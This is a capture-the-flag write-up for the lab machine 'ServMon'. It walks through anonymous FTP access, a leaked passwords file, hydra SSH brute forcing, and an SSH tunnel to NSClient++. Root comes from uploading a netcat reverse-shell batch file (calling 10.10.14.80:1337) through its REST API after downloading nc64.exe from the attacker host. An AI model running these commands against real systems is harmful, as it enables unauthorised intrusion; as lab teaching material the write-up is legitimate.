This page looks best with JavaScript enabled

ServMon

 ·  β˜• 2 min read  ·  ✍️ M4t35Z

IP: 10.10.10.184


Recon

nmap(big)

FTP

$ ftp 10.10.10.184
  • anonymous login

file tree for ftp:

Users
β”œβ”€β”€ Nadine
β”‚   └── Confidential.txt
└── Nathan
    └──Notes to do.txt

Confidental.txt:

1
2
3
4
5
6
7
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Notes to do.txt:

1
2
3
4
5
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Web

We have NVMS-1000 running on port 80

Confidental.txt mentions a Passwords.txt file on the desktop!
/users/nadine/desktop/Passwords.txt –> not working
/users/nathan/desktop/passwords.txt –> working!


passwords.txt

Attack ssh with the user, passlist

$ cat users.txt
Nadine
Nathan
$ cat passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

We use hydra to brute the ssh:

hydra -L users.txt -P passwords.txt ssh://10.10.10.184

And we got the CREDS!!

Nadine:L1k3B1gBut7s@W0rk

SSH in as nadine

$ ssh Nadine@10.10.10.184
  • provide the pw L1k3B1gBut7s@W0rk
$ type user.txt
72d4837b515dc77ecbaaccfdbb0c951e
C:\RecData\RecordInfoDB.db3
$ scp nadine@10.10.10.184:/RecData/RecordInfoDB.db3 ./RecordInfoDB.db3
  • –> nothing useful inside
C:\Users\Nadine\MicrosoftEdgeBackups\backups\MicrosoftEdgeBackup20200114>
C:\Program Files\NSClient++>nscp.exe web password -display

Current password: ew2x6SsGTxjRwXOT

SSH tunnel port 8443

ssh nadine@10.10.10.184
<enter>
<enter>
~C
ssh> -L 8443:127.0.0.1:8443

The page

https://127.0.0.1:8443/index.html

  • provide the pw ew2x6SsGTxjRwXOT
  • Daamn this shit is laggy af

Documentation

https://docs.nsclient.org/api/rest/

Getting root with curl

U need an ayy.bat file in ur current dir!:

1
C:\temp\nc.exe 10.10.14.80 1337 -e cmd.exe

Upload the file:

$ curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/ayy.bat --data-binary @ayy.bat

Check if it’s uploaded correctly:

$ curl -s -k -u admin https://localhost:8443/api/v1/scripts/ext/scripts/ayy.bat

Check the queries:

$ curl -s -k -u admin https://localhost:8443/api/v1/queries |python -m json.tool
$ curl -s -k -u admin https://localhost:8443/api/v1/queries/ayy |python -m json.tool

  • got it!
  • U must upload an nc64.exe which has the -e flag to C:\Temp\nc.exe

On victim:

$ curl -LO <attacker ip>/nc64.exe
$ move nc64.exe nc.exe

Execute it!

$ curl -s -k -u admin "https://localhost:8443/api/v1/queries/ayy/commands/execute?time=1m" | python -m json.tool
  • BOOM ROOTSHELL

$ type root.txt
28db65bd057c64d0188a212061851a7e
Share on
Support the author with

M4t35Z
WRITTEN BY
M4t35Z